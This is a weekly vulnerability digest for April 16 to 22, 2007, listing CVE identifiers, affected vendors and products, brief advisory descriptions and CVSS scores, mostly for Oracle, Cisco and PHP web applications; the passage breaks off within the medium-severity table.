Weekly Vulnerabilities Reports > April 16 to 22, 2007

Overview

149 new vulnerabilities reported during this period, including 30 critical vulnerabilities and 57 high severity vulnerabilities. This weekly summary report vulnerabilities in 116 products from 93 vendors including Oracle, Cisco, Microsoft, Maian, and Stephen Craton. Vulnerabilities are notably categorized as "Code Injection", "Resource Management Errors", "Permissions, Privileges, and Access Controls", "SQL Injection", and "Numeric Errors".

  • 133 reported vulnerabilities are remotely exploitables.
  • 29 reported vulnerabilities have public exploit available.
  • 2 reported vulnerabilities are related to weaknesses in OWASP Top Ten.
  • 137 reported vulnerabilities are exploitable by an anonymous user.
  • Oracle has the most reported vulnerabilities, with 27 reported vulnerabilities.
  • Oracle has the most reported critical vulnerabilities, with 15 reported vulnerabilities.

TOTAL
VULNERABILITIES
CRITICAL RISK
VULNERABILITIES
HIGH RISK
VULNERABILITIES
MEDIUM RISK
VULNERABILITIES
LOW RISK
VULNERABILITIES
REMOTELY
EXPLOITABLE
LOCALLY
EXPLOITABLE
EXPLOIT
AVAILABLE
EXPLOITABLE
ANONYMOUSLY
AFFECTING
WEB APPLICATION

Vulnerability Details

The following table list reported vulnerabilities for the period covered by this report:

Expand/Hide

30 Critical Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2007-04-22 CVE-2007-2137 IBM Heap Buffer Overflow vulnerability in IBM Tivoli Monitoring Express 6.1.0

Heap-based buffer overflow in kde.dll in IBM Tivoli Monitoring Express 6.1.0 before Fix Pack 2, as used in Tivoli Universal Agent, Windows OS Monitoring agent, and Enterprise Portal Server, allows remote attackers to execute arbitrary code by sending a long string to a certain TCP port.

10.0
2007-04-19 CVE-2007-2149 Stephen Craton Remote Security vulnerability in Chatness

Stephen Craton (aka WiredPHP) Chatness 2.5.3 and earlier stores usernames and unencrypted passwords in (1) classes/vars.php and (2) classes/varstuff.php, and recommends 0666 or 0777 permissions for these files, which allows local users to gain privileges by reading the files, and allows remote attackers to obtain credentials via a direct request for admin/options.php.

10.0
2007-04-19 CVE-2007-2147 Stephen Craton Remote Security vulnerability in Chatness

admin/options.php in Stephen Craton (aka WiredPHP) Chatness 2.5.3 and earlier does not check for administrative credentials, which allows remote attackers to read and modify the classes/vars.php and classes/varstuff.php configuration files via direct requests.

10.0
2007-04-18 CVE-2007-2133 Oracle Multiple vulnerability in Oracle Peoplesoft Enterprise 8.9

Unspecified vulnerability in the PeopleSoft Enterprise Human Capital Management component in Oracle PeopleSoft Enterprise 8.9 has unknown impact and attack vectors, aka PSEHCM01.

10.0
2007-04-18 CVE-2007-2132 Oracle Multiple vulnerability in Oracle Peoplesoft Enterprise 8.47.12/8.48.08

Unspecified vulnerability in the PeopleTools component in Oracle PeopleSoft Enterprise 8.47.12 and 8.48.08 has unknown impact and attack vectors, aka PSE02.

10.0
2007-04-18 CVE-2007-2131 Oracle Multiple vulnerability in Oracle Peoplesoft Enterprise 8.22.14/8.47.12/8.48.08

Unspecified vulnerability in PeopleTools in Oracle PeopleSoft Enterprise 8.22.14, 8.47.12, and 8.48.08 has unknown impact and attack vectors, aka PSE01.

10.0
2007-04-18 CVE-2007-2129 Oracle Multiple vulnerability in Oracle Enterprise Manager 9.2.0.8

Unspecified vulnerability in the Agent component in Oracle Enterprise Manager 9.2.0.8 has unknown impact and remote attack vectors, aka EM01.

10.0
2007-04-18 CVE-2007-2127 Oracle Multiple vulnerability in Oracle E-Business Suite 12.0.0

Multiple unspecified vulnerabilities in Oracle E-Business Suite 12.0.0 have unknown impact and remote attack vectors via (1) Application Object Library (APPS04), iStore (2) APPS05 and (3) APPS06, (4) iSupport (APPS07), (5) Trade Management (APPS09), (6) Applications Manager (APPS10), and (7) Oracle Report Manager (APPS03).

10.0
2007-04-18 CVE-2007-2126 Oracle Multiple vulnerability in Oracle E-Business Suite 11.5.10.2

Unspecified vulnerability in Oracle E-Business Suite 11.5.10CU2 has unknown impact and remote attack vectors in the (1) Common Applications (APPS01) and (2) iProcurement (APPS02).

10.0
2007-04-18 CVE-2007-2125 Oracle Multiple vulnerability in Oracle Collaboration Suite 10.1.2

Unspecified vulnerability in Collaborative Workspace in Oracle Collaboration Suite 10.1.2 has unknown impact and attack vectors, aka OCS01.

10.0
2007-04-18 CVE-2007-2124 Oracle Multiple vulnerability in Oracle Application Server 10.1.4.1.0

Unspecified vulnerability in the Portal component in Oracle Application Server 10.1.4.1.0 has unknown impact and remote attack vectors, aka AS05.

10.0
2007-04-18 CVE-2007-2123 Oracle Multiple vulnerability in Oracle April 2007 Security Update

Unspecified vulnerability in the Portal component in Oracle Application Server 10.1.3 up to 10.1.3.2.0, 10.1.2 up to 10.1.2.2.0, and 9.0.4.3 has unknown impact and attack vectors, aka AS04.

10.0
2007-04-18 CVE-2007-2122 Oracle Multiple vulnerability in Oracle Application Server 9.0.4.3

Unspecified vulnerability in the Wireless component in Oracle Application Server 9.0.4.3 has unknown impact and attack vectors, aka AS03.

10.0
2007-04-18 CVE-2007-2121 Oracle Multiple vulnerability in Oracle Application Server 7.0.4.4

Unspecified vulnerability in the COREid Access component in Oracle Application Server 7.0.4.4 has unknown impact and attack vectors, aka AS02.

10.0
2007-04-18 CVE-2007-2101 FAC Guestbook Information Disclosure vulnerability in FAC Guestbook FAC Guestbook 3.01

FAC Guestbook 3.01 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/gbdb.mdb.

10.0
2007-04-18 CVE-2007-2100 FAC Guestbook Information Disclosure vulnerability in FAC Guestbook FAC Guestbook 2.0

FAC Guestbook 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for db/Gdb.mdb.

10.0
2007-04-18 CVE-2007-2059 Eiqnetworks Remote Security vulnerability in Eiqnetworks Enterprise Security Analyzer 2.5

Multiple buffer overflows in the ESA protocol implementation in eIQnetworks Enterprise Security Analyzer (ESA) 2.5 allow remote attackers to execute arbitrary code via a long parameter to the (1) DELETESEARCHFOLDER, (2) DELTASK, (3) HMGR_CHECKHOSTSCSV, (4) TASKUPDATEDUSER, (5) VERIFYUSERKEY, or (6) VERIFYPWD command.

10.0
2007-04-18 CVE-2007-2057 Aircrack NG Buffer Overflow vulnerability in Aircrack-Ng Airodump-Ng 0.7

Stack-based buffer overflow in aircrack-ng airodump-ng 0.7 allows remote attackers to execute arbitrary code via crafted 802.11 authentication packets.

10.0
2007-04-18 CVE-2007-1674 Landesk Buffer Overflow vulnerability in Landesk Management Suite 8.7

Stack-based buffer overflow in the Alert Service (aolnsrvr.exe) in LANDesk Management Suite 8.7 allows remote attackers to execute arbitrary code via a crafted packet to port 65535/UDP.

10.0
2007-04-16 CVE-2007-2036 Cisco Remote vulnerability in Cisco Wireless LAN Controller Software 4.1

The SNMP implementation in the Cisco Wireless LAN Controller (WLC) before 20070419 uses the default read-only community public, and the default read-write community private, which allows remote attackers to read and modify SNMP variables, aka Bug ID CSCse02384.

10.0
2007-04-16 CVE-2007-2031 3Proxy Buffer Overflow vulnerability in 3proxy HTTP Proxy Request

Buffer overflow in the HTTP proxy service for 3proxy 0.5 to 0.5.3g, and 0.6b-devel before 20070413, might allow remote attackers to execute arbitrary code via crafted transparent requests.

10.0
2007-04-18 CVE-2007-2079 Xampp Remote Buffer Overflow vulnerability in XAMPP Mssql_Connect

The ADONewConnection Connect function in adodb.php in XAMPP 1.6.0a and earlier for Windows uses untrusted input for the database server hostname, which allows remote attackers to trigger a library buffer overflow and execute arbitrary code via a long host parameter, or have other unspecified impact.

9.3
2007-04-18 CVE-2007-2062 Vcdgear Remote Buffer Overflow vulnerability in VCDGear File Format

Stack-based buffer overflow in VCDGear 3.55 and 3.56 BETA allows user-assisted remote attackers to execute arbitrary code via a long FILE argument in a CUE file.

9.3
2007-04-18 CVE-2007-1892 Akamai Technologies Buffer Overflow vulnerability in Akamai Technologies Download Manager 2.2.0.0

Stack-based buffer overflow in Akamai Technologies Download Manager ActiveX Control (DownloadManagerV2.ocx) before 2.2.1.0 allows remote attackers to execute arbitrary code via unspecified vectors, a different issue than CVE-2007-1891.

9.3
2007-04-18 CVE-2007-1891 Akamai Technologies Buffer Overflow vulnerability in Akamai Technologies Download Manager 2.2.0.0

Stack-based buffer overflow in the GetPrivateProfileSectionW function in Akamai Technologies Download Manager ActiveX Control (DownloadManagerV2.ocx) after 2.0.4.4 but before 2.2.1.0 allows remote attackers to execute arbitrary code, related to misinterpretation of the nSize parameter as a byte count instead of a wide character count.

9.3
2007-04-18 CVE-2007-2130 Oracle Multiple vulnerability in Oracle April 2007 Security Update

Unspecified vulnerability in Workflow Cartridge, as used in Oracle Database Server 9.2.0.1, 10.1.0.2, and 10.2.0.1; Application Server 9.0.4.3 and 10.1.2.0.2; Collaboration Suite 10.1.2; and E-Business Suite; has unknown impact and remote authenticated attack vectors, aka OWF01.

9.0
2007-04-18 CVE-2007-2128 Oracle Multiple vulnerability in Oracle E-Business Suite 11.5.10

Unspecified vulnerability in the Sales Online component for Oracle E-Business Suite 11.5.10 has unknown impact and remote authenticated attack vectors, aka APPS08.

9.0
2007-04-18 CVE-2007-2116 Oracle Multiple vulnerability in Oracle April 2007 Security Update

Unspecified vulnerability in the Advanced Replication component in Oracle Database 9.0.1.5+, 9.2.0.7, and 10.1.0.5 has unknown impact and attack vectors, aka DB10.

9.0
2007-04-18 CVE-2007-2114 Oracle Multiple vulnerability in Oracle April 2007 Security Update

Multiple unspecified vulnerabilities in Oracle Database 10.1.0.5 and 10.2.0.2 have unknown impact and remote authenticated attack vectors, related to (1) Change Data Capture (CDC), aka DB08, and (2) Oracle Instant Client, aka DB11.

9.0
2007-04-16 CVE-2007-2034 Cisco Multiple vulnerability in Cisco Wireless Control System

Unspecified vulnerability in Cisco Wireless Control System (WCS) before 4.0.87.0 allows remote authenticated users to gain the privileges of the SuperUsers group, and manage the application and its networks, related to the group membership of user accounts, aka Bug ID CSCsg05190.

9.0

57 High Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2007-04-19 CVE-2007-2152 Mcafee Buffer Overflow vulnerability in Mcafee Virusscan Enterprise 8.0I

Buffer overflow in the On-Access Scanner in McAfee VirusScan Enterprise before 8.0i Patch 12 allows user-assisted remote attackers to execute arbitrary code via a long filename containing multi-byte (Unicode) characters.

7.9
2007-04-22 CVE-2007-2162 GNU
Mozilla
Denial-Of-Service vulnerability in Iceweasel

(1) Mozilla Firefox 2.0.0.3 and (2) GNU IceWeasel 2.0.0.3 allow remote attackers to cause a denial of service (browser crash or system hang) via JavaScript that matches a regular expression against a long string, as demonstrated using /(.)*/.

7.8
2007-04-19 CVE-2007-2157 Zomplog Directory Traversal vulnerability in Zomplog 3.8

Directory traversal vulnerability in upload/force_download.php in Zomplog 3.8 allows remote attackers to read arbitrary files via a ..

7.8
2007-04-19 CVE-2007-2155 Phpfaber Directory Traversal vulnerability in PHPFaber TopSites Admin/

Directory traversal vulnerability in template.php in in phpFaber TopSites 3 allows remote attackers to read arbitrary files via a ..

7.8
2007-04-19 CVE-2007-2150 Bluearc Unspecified vulnerability in Bluearc Titan 2100/2200/2500

BlueArc-FTPD in BlueArc Titan 2x00 devices with firmware 4.2.944b allows remote attackers to redirect traffic to other sites (aka FTP bounce) via the PORT command, a variant of CVE-1999-0017.

7.8
2007-04-18 CVE-2007-2120 Oracle Resource Management Errors vulnerability in Oracle Application Server 10.1.2.0.2/10.1.2.2/9.0.4.3

The Oracle Discoverer servlet in Oracle Application Server 9.0.4.3, 10.1.2.0.2, and 10.1.2.2.0 allows remote attackers to shut down an Oracle TNS Listener via a TNS STOP command in a request that uses the database/TNS alias, aka AS01.

7.8
2007-04-18 CVE-2007-1870 Lighttpd Remote Denial of Service vulnerability in Lighttpd

lighttpd before 1.4.14 allows attackers to cause a denial of service (crash) via a request to a file whose mtime is 0, which results in a NULL pointer dereference.

7.8
2007-04-16 CVE-2007-2035 Cisco Multiple vulnerability in Cisco Wireless Control System

Cisco Wireless Control System (WCS) before 4.0.66.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain network organization data via a direct request for files in certain directories, aka Bug ID CSCsg04301.

7.8
2007-04-22 CVE-2007-2169 Mozzers Subsystem Remote Code Execution vulnerability in Mozzers SubSystem Add.PHP

Static code injection vulnerability in add.php in Mozzers SubSystem 1.0 allows remote attackers to inject PHP code into subs.php via the (1) Sub-name or (2) Sub-url field.

7.5
2007-04-22 CVE-2007-2168 Aimstats Remote Code Execution vulnerability in AimStats Process.PHP

Static code injection vulnerability in process.php in AimStats 3.2 and earlier allows remote attackers to inject PHP code into config.php via the databasehost parameter.

7.5
2007-04-22 CVE-2007-2167 Aimstats Remote Code Execution vulnerability in Aimstats 3.2

Static code injection vulnerability in process.php in AimStats 3.2 allows remote attackers to inject PHP code into config.php via the number parameter in an update action.

7.5
2007-04-22 CVE-2007-2160 Drupal Cross-Site Request Forgery vulnerability in Drupal Database Administration Module 4.6/4.7

Multiple cross-site request forgery (CSRF) vulnerabilities in the Database Administration (dba) module 4.6.x-*, and before 4.7.x-1.2 in the 4.7.x-1.* series, for Drupal allow remote attackers to perform unauthorized actions as an arbitrary user, a related issue to CVE-2006-5476.

7.5
2007-04-22 CVE-2007-2136 BMC Unspecified vulnerability in BMC Patrol Perform Agent

Stack-based buffer overflow in bgs_sdservice.exe in BMC Patrol PerformAgent allows remote attackers to execute arbitrary code by connecting to TCP port 10128 and sending certain XDR data, which is not properly parsed.

7.5
2007-04-22 CVE-2007-1972 BMC Unspecified vulnerability in BMC Performance Manager

** DISPUTED ** PatrolAgent.exe in BMC Performance Manager does not require authentication for requests to modify configuration files, which allows remote attackers to execute arbitrary code via a request on TCP port 3181 for modification of the masterAgentName and masterAgentStartLine SNMP parameters.

7.5
2007-04-19 CVE-2007-2158 Kooijman Design Remote Security vulnerability in Kooijman-Design Jgallery 1.3

PHP remote file inclusion vulnerability in index.php in jGallery 1.3 allows remote attackers to execute arbitrary PHP code via a URL in the G_JGALL[inc_path] parameter.

7.5
2007-04-19 CVE-2007-2156 Rezervi Generic Remote File Include vulnerability in Rezervi Root Parameter

Multiple PHP remote file inclusion vulnerabilities in Rezervi Generic 0.9 allow remote attackers to execute arbitrary PHP code via a URL in the root parameter to (1) datumVonDatumBis.inc.php, (2) footer.inc.php, (3) header.inc.php, and (4) stylesheets.php in templates/; and (5) wochenuebersicht.inc.php, (6) monatsuebersicht.inc.php, (7) jahresuebersicht.inc.php, and (8) tagesuebersicht.inc.php in belegungsplan/.

7.5
2007-04-19 CVE-2007-2154 Cabron Connector Remote File Include vulnerability in Cabron Connector InclusionService.PHP

PHP remote file inclusion vulnerability in services/samples/inclusionService.php in Cabron Connector 1.1.0 allows remote attackers to execute arbitrary PHP code via a URL in the CabronServiceFolder parameter.

7.5
2007-04-19 CVE-2007-2146 Minigal Remote Security vulnerability in Minigal B13

The imagecomments function in classes.php in MiniGal b13 allow remote attackers to inject arbitrary PHP code into a file in the thumbs/ directory via the (1) name or (2) email parameter.

7.5
2007-04-19 CVE-2007-2145 Minigal Remote Security vulnerability in Minigal B13

The imagecomments function in classes.php in MiniGal b13 allows remote attackers to inject arbitrary PHP code into a file in the thumbs/ directory via the input parameter.

7.5
2007-04-19 CVE-2007-2143 Bonoestente Remote File Include vulnerability in Joomla Template Module

PHP remote file inclusion vulnerability in index.php in the Be2004-2 template for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.

7.5
2007-04-19 CVE-2007-2142 Ajportal2Php Remote File Include vulnerability in AJPortal2PHP

Multiple PHP remote file inclusion vulnerabilities in AjPortal2Php allow remote attackers to execute arbitrary PHP code via a URL in the PagePrefix parameter to (1) begin.inc.php, (2) connection.inc.php, (3) events.inc.php, (4) footer.inc.php, (5) header.inc.php, (6) menuleft.inc.php, or (7) pages.inc.php in includes/.

7.5
2007-04-19 CVE-2007-2141 Shoutpro Remote PHP Code Execution vulnerability in ShoutPro Shoutbox.PHP

Direct static code injection vulnerability in shoutbox.php in ShoutPro 1.5.2 allows remote attackers to inject arbitrary PHP code into shouts.php via the shout parameter.

7.5
2007-04-19 CVE-2007-2140 Franklin Huang Remote Security vulnerability in Franklin Huang Flip-Search-Add-On 2.0

PHP remote file inclusion vulnerability in everything.php in Franklin Huang Flip (aka Flip-search-add-on) 2.0 allows remote attackers to execute arbitrary PHP code via a URL in the incpath parameter.

7.5
2007-04-19 CVE-2007-1681 SUN Unspecified vulnerability in SUN Java web Console and Solaris

Format string vulnerability in libwebconsole_services.so in Sun Java Web Console 2.2.2 through 2.2.5 allows remote attackers to cause a denial of service (application crash), obtain sensitive information, and possibly execute arbitrary code via unspecified vectors during a failed login attempt, related to syslog.

7.5
2007-04-18 CVE-2007-2118 Oracle Multiple vulnerability in Oracle April 2007 Security Update

Unspecified vulnerability in the Upgrade/Downgrade component of Oracle Database 9.0.1.5 and 9.2.0.7 has unknown impact and attack vectors, aka DB13.

7.5
2007-04-18 CVE-2007-2113 Oracle SQL Injection vulnerability in Oracle Database Server 10.1.0.5

SQL injection vulnerability in the Upgrade/Downgrade component (DBMS_UPGRADE_INTERNAL) for Oracle Database 10.1.0.5 allows remote authenticated users to execute arbitrary SQL commands via unknown vectors, aka DB07.

7.5
2007-04-18 CVE-2007-2107 Rha7 Downloads SQL-Injection vulnerability in Rha7 Downloads Rha7 Downloads 1.0

SQL injection vulnerability in visit.php in the Rha7 Downloads (rha7downloads) 1.0 module for XOOPS allows remote attackers to execute arbitrary SQL commands via the cid parameter, a different vector than CVE-2007-1960.

7.5
2007-04-18 CVE-2007-2106 KAI Content Management System File-Upload vulnerability in KAI Content Management System KAI Content Management System 1.0

Directory traversal vulnerability in index.php in Kai Content Management System (K-CMS) 1.0 allows remote attackers to include and execute arbitrary local files via a ..

7.5
2007-04-18 CVE-2007-2105 Monkey CMS File-Upload vulnerability in Monkey CMS Monkey CMS 0.0.3

Directory traversal vulnerability in admin/index.php in Monkey CMS 0.0.3 allows remote attackers to include and execute arbitrary local files via a ..

7.5
2007-04-18 CVE-2007-2104 Ixon CMS File-Upload vulnerability in Ixon CMS Ixon CMS 0.30

Multiple directory traversal vulnerabilities in iXon CMS 0.30 allow remote attackers to include and execute arbitrary local files via a ..

7.5
2007-04-18 CVE-2007-2103 MY Little Homepage Remote Security vulnerability in MY Little Homepage MY Little Forum 1.7

Multiple PHP remote file inclusion vulnerabilities in my little forum 1.7 allow remote attackers to execute arbitrary PHP code via a URL in the lang parameter to (1) admin.php and (2) timedifference.php.

7.5
2007-04-18 CVE-2007-2097 Openconcept Unspecified vulnerability in Openconcept Back-End CMS 0.4.7

** DISPUTED ** Multiple PHP remote file inclusion vulnerabilities in OpenConcept Back-End CMS 0.4.7 allow remote attackers to execute arbitrary PHP code via a URL in the includes_path parameter to (1) click.php or (2) pollcollector.php in htdocs/; or (3) index.php, (4) articlepages.php, (5) articles.php, (6) articleform.php, (7) articlesections.php, (8) createArticlesPage.php, (9) guestbook.php, (10) helpguide.php, (11) helpguideeditor.php, (12) links.php, (13) upload.php, (14) sitestatistics.php, (15) nav.php, (16) tpl_upload.php, (17) linksections, or (18) pophelp.php in htdocs/site-admin/; different vectors than CVE-2006-5076.

7.5
2007-04-18 CVE-2007-2096 Hinton Design Remote Security vulnerability in Phphd Download System

PHP remote file inclusion vulnerability in common.php in Hinton Design PHPHD Download System (phphd_downloads) allows remote attackers to execute arbitrary PHP code via a URL in the phphd_real_path parameter.

7.5
2007-04-18 CVE-2007-2095 Myspeach Remote Security vulnerability in Myspeach 1.9

PHP remote file inclusion vulnerability in chat.php in MySpeach 1.9 allows remote attackers to execute arbitrary PHP code via a URL in the my[root] parameter, a different vector than CVE-2007-0498.

7.5
2007-04-18 CVE-2007-2094 Anthologia Remote File Include vulnerability in Anthologia 0.5.2

PHP remote file inclusion vulnerability in index.php in Anthologia 0.5.2 allows remote attackers to execute arbitrary PHP code via a URL in the ads_file parameter.

7.5
2007-04-18 CVE-2007-2093 Limesoft Remote PHP Code Execution vulnerability in Limesoft Guestbook 1.0

Direct static code injection vulnerability in index.php in Limesoft Guestbook (LS Simple Guestbook) 1.0 allows remote attackers to inject arbitrary PHP code into posts.txt via the message parameter.

7.5
2007-04-18 CVE-2007-2092 Limesoft Remote Security vulnerability in Limesoft Guestbook 1.0

Direct static code injection vulnerability in index.php in Limesoft Guestbook (LS Simple Guestbook) allows remote attackers to inject arbitrary PHP code into posts.txt via the name parameter.

7.5
2007-04-18 CVE-2007-2091 Tsdisplay4Xoops Code Injection vulnerability in Tsdisplay4Xoops 0.1

PHP remote file inclusion vulnerability in blocks/tsdisplay4xoops_block2.php in tsdisplay4xoops (TSD4XOOPS, aka the TeamSpeak display module) 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the xoops_url parameter.

7.5
2007-04-18 CVE-2007-2088 Sitebar Remote Security vulnerability in SiteBar

Multiple PHP remote file inclusion vulnerabilities in Sitebar 3.3.5 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) writerFile parameter to index.php and the (2) file parameter to Integrator.php.

7.5
2007-04-18 CVE-2007-2081 Myblog Authentication Bypass vulnerability in MyBlog Settings.PHP

MyBlog 0.9.8 and earlier allows remote attackers to bypass authentication requirements via the admin cookie parameter to certain admin files, as demonstrated by admin/settings.php.

7.5
2007-04-18 CVE-2007-2080 Xampp SQL-Injection vulnerability in Xampp Apache Distribution 1.6.0A

Multiple SQL injection vulnerabilities in XAMPP 1.6.0a for Windows allow remote attackers to execute arbitrary SQL commands via unspecified vectors in certain test scripts.

7.5
2007-04-18 CVE-2007-2077 Maian Remote Security vulnerability in Maian Search 1.1

PHP remote file inclusion vulnerability in search.php in Maian Search 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the path_to_folder parameter.

7.5
2007-04-18 CVE-2007-2073 Ivan Gallery Script Remote Security vulnerability in Ivan Gallery Script Ivan Gallery Script 0.3

PHP remote file inclusion vulnerability in index.php in Ivan Gallery Script 0.3 allows remote attackers to execute arbitrary PHP code via a URL in the gallery parameter in a new session.

7.5
2007-04-18 CVE-2007-2072 Ivan Gallery Script Remote File Include vulnerability in Ivan Gallery Script Ivan Gallery Script 0.1

** DISPUTED ** PHP remote file inclusion vulnerability in index.php in Ivan Gallery Script 0.1 allows remote attackers to execute arbitrary PHP code via a URL in the dir parameter.

7.5
2007-04-18 CVE-2007-2070 Turnkey WEB Tools Code Injection vulnerability in Turnkey web Tools Sunshop Shopping Cart 3.5

Multiple PHP remote file inclusion vulnerabilities in Turnkey Web Tools SunShop Shopping Cart before 3.5.1 allow remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter to (1) index.php or (2) checkout.php.

7.5
2007-04-18 CVE-2007-2069 Openmairie Applications 'dsn[phptype]' Parameter Local File Include vulnerability in openMairie

Directory traversal vulnerability in scr/soustab.php in openMairie 1.11 and earlier allows remote attackers to include and execute arbitrary local files via a ..

7.5
2007-04-18 CVE-2007-2067 Webslider Remote Security vulnerability in Webslider 0.6

Multiple PHP remote file inclusion vulnerabilities in Marco Antonio Islas Cruz Web Slider (WebSlider) 0.6 allow remote attackers to execute arbitrary PHP code via a URL in the path parameter to (1) index.php, (2) modules/pdf.php, (3) plugins/highlight.php, or (4) include/modules.php.

7.5
2007-04-18 CVE-2007-2065 Actionpoll Remote File Include vulnerability in Actionpoll 1.1.1

PHP remote file inclusion vulnerability in db/PollDB.php in Robert Ladstaetter ActionPoll 1.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the CONFIG_DATAREADERWRITER parameter, a different vector than CVE-2001-1297.

7.5
2007-04-18 CVE-2007-2064 Actionpoll Remote File Include vulnerability in Actionpoll 1.1.0/1.1.1

Multiple PHP remote file inclusion vulnerabilities in Robert Ladstaetter ActionPoll 1.1.0, and possibly 1.1.1, allow remote attackers to execute arbitrary PHP code via a URL in (1) the CONFIG_POLLDB parameter to actionpoll.php or (2) the CONFIG_DB parameter to db/DataReaderWriter.php, different vectors than CVE-2001-1297.

7.5
2007-04-16 CVE-2007-2047 Openads Remote Security vulnerability in Openads 2.3.30

CRLF injection vulnerability in www/delivery/ck.php in Openads 2.3 (aka Max Media Manager, MMM) before 0.3.31-alpha-pr3 allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in the destination parameter.

7.5
2007-04-16 CVE-2007-2046 Openads Remote Security vulnerability in Openads

Multiple CRLF injection vulnerabilities in adclick.php in (a) Openads (phpAdsNew) 2.0.11 and earlier and (b) Openads for PostgreSQL (phpPgAds) 2.0.11 and earlier allow remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in (1) the dest parameter and (2) the Referer HTTP header.

7.5
2007-04-16 CVE-2007-2044 Antonis Ventouris Remote Security vulnerability in Weather Module

PHP remote file inclusion vulnerability in mod_weather.php in the Antonis Ventouris Weather module for Mambo and Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the absolute_path parameter.

7.5
2007-04-16 CVE-2007-2043 Avant Garde Solutions Remote File Include vulnerability in Mambo/Joomla Com_Mosmedia MosConfig_Absolute_Path

Multiple PHP remote file inclusion vulnerabilities in the Avant-Garde Solutions MOSMedia (com_mosmedia) 1.08 and earlier module for Mambo and Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter to (1) media.tab.php or (2) media.divs.php.

7.5
2007-04-16 CVE-2007-2032 Cisco Multiple vulnerability in Cisco Wireless Control System 4.0/4.0.95

Cisco Wireless Control System (WCS) before 4.0.96.0 has a hard-coded FTP username and password for backup operations, which allows remote attackers to read and modify arbitrary files via unspecified vectors related to "properties of the FTP server," aka Bug ID CSCse93014.

7.5
2007-04-16 CVE-2007-1997 Clam Anti Virus Remote vulnerability in ClamAV

Integer signedness error in the (1) cab_unstore and (2) cab_extract functions in libclamav/cab.c in Clam AntiVirus (ClamAV) before 0.90.2 allow remote attackers to execute arbitrary code via a crafted CHM file that contains a negative integer, which passes a signed comparison and leads to a stack-based buffer overflow.

7.5
2007-04-18 CVE-2007-2134 Oracle Multiple vulnerability in Oracle April 2007 Security Update

Unspecified vulnerability in the HTML Server in Oracle JD Edwards EnterpriseOne SP23_Q1 and 8.96.I1 has unknown impact and local attack vectors, aka JDE01.

7.2
2007-04-16 CVE-2007-1745 Clam Anti Virus
Ifenslave
Remote vulnerability in ClamAV

The chm_decompress_stream function in libclamav/chmunpack.c in Clam AntiVirus (ClamAV) before 0.90.2 leaks file descriptors, which has unknown impact and attack vectors involving a crafted CHM file, a different vulnerability than CVE-2007-0897.

7.1

59 Medium Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2007-04-18 CVE-2007-2083 Zonelabs Unspecified vulnerability in Zonelabs Zonealarm

vsdatant.sys in Check Point Zone Labs ZoneAlarm Pro before 7.0.302.000 does not validate certain arguments before being passed to hooked SSDT function handlers, which allows local users to cause a denial of service (system crash) or possibly execute arbitrary code via crafted arguments to the (1) NtCreateKey and (2) NtDeleteFile functions.

6.9
2007-04-18 CVE-2007-2075 Scramdisk 4 Linux Local Privilege Escalation vulnerability in ScramDisk 4 Linux

ScramDisk 4 Linux before 1.0-1 does not perform permission checks on mount points, which allows local users to gain privileges by using a system directory as a mount point for a container.

6.9
2007-04-22 CVE-2007-2166 Opensurveypilot Remote File Include vulnerability in OpenSurveyPilot Group.Inc.PHP

PHP remote file inclusion vulnerability in administration/user/lib/group.inc.php in OpenSurveyPilot (osp) 1.2.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the cfgPathToProjectAdmin parameter.

6.8
2007-04-19 CVE-2007-2153 Atmail Cross-Site Scripting vulnerability in @Mail Atmail.PHP

Cross-site scripting (XSS) vulnerability in atmail.php in @Mail 5.0 allows remote attackers to inject arbitrary web script or HTML via the username parameter.

6.8
2007-04-19 CVE-2007-2144 Joomlapack Code Injection vulnerability in Joomlapack 1.0.4A2Re

PHP remote file inclusion vulnerability in includes/CAltInstaller.php in the JoomlaPack (com_jpack) 1.0.4a2 RE component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.

6.8
2007-04-19 CVE-2007-1691 Second Sight Software ActiveX Controls Multiple Buffer Overflow vulnerability in Second Sight Software

Stack-based buffer overflow in Second Sight Software ActiveMod ActiveX control (ActiveMod.ocx) allows remote attackers to execute arbitrary code via unspecified vectors.

6.8
2007-04-19 CVE-2007-1690 Second Sight Software ActiveX Controls Multiple Buffer Overflow vulnerability in Second Sight Software

Multiple stack-based buffer overflows in Second Sight Software ActiveGS ActiveX control (ActiveGS.ocx) allow remote attackers to execute arbitrary code via unspecified vectors.

6.8
2007-04-18 CVE-2007-2119 Oracle Multiple vulnerability in Oracle Application Server and Database Server

Cross-site scripting (XSS) vulnerability in boundary_rules.jsp in the Administration Front End for Oracle Enterprise (Ultra) Search, as used in Database Server 9.2.0.8, 10.1.0.5, and 10.2.0.2, and in Application Server 9.0.4.3, 10.1.2.0.2, and 10.1.2.2.0 allows remote attackers to inject arbitrary HTML or web script via the EXPTYPE parameter, aka SES01.

6.8
2007-04-18 CVE-2007-2117 Oracle Multiple vulnerability in Oracle Database Server 9.2.0.5

Unspecified vulnerability in the Oracle Text component in Oracle Database 9.0.1.5+ and 9.2.0.5 has unknown impact and attack vectors, aka DB12.

6.8
2007-04-18 CVE-2007-2115 Oracle Multiple vulnerability in Oracle Database Server 10.1.0.5/10.2.0.2/9.2.0.7

Unspecified vulnerability in the Change Data Capture (CDC) component in Oracle Database 9.2.0.7, 10.1.0.5, and 10.2.0.2 has unknown impact and attack vectors, aka DB09.

6.8
2007-04-18 CVE-2007-2108 Microsoft
Oracle
Permissions, Privileges, and Access Controls vulnerability in multiple products

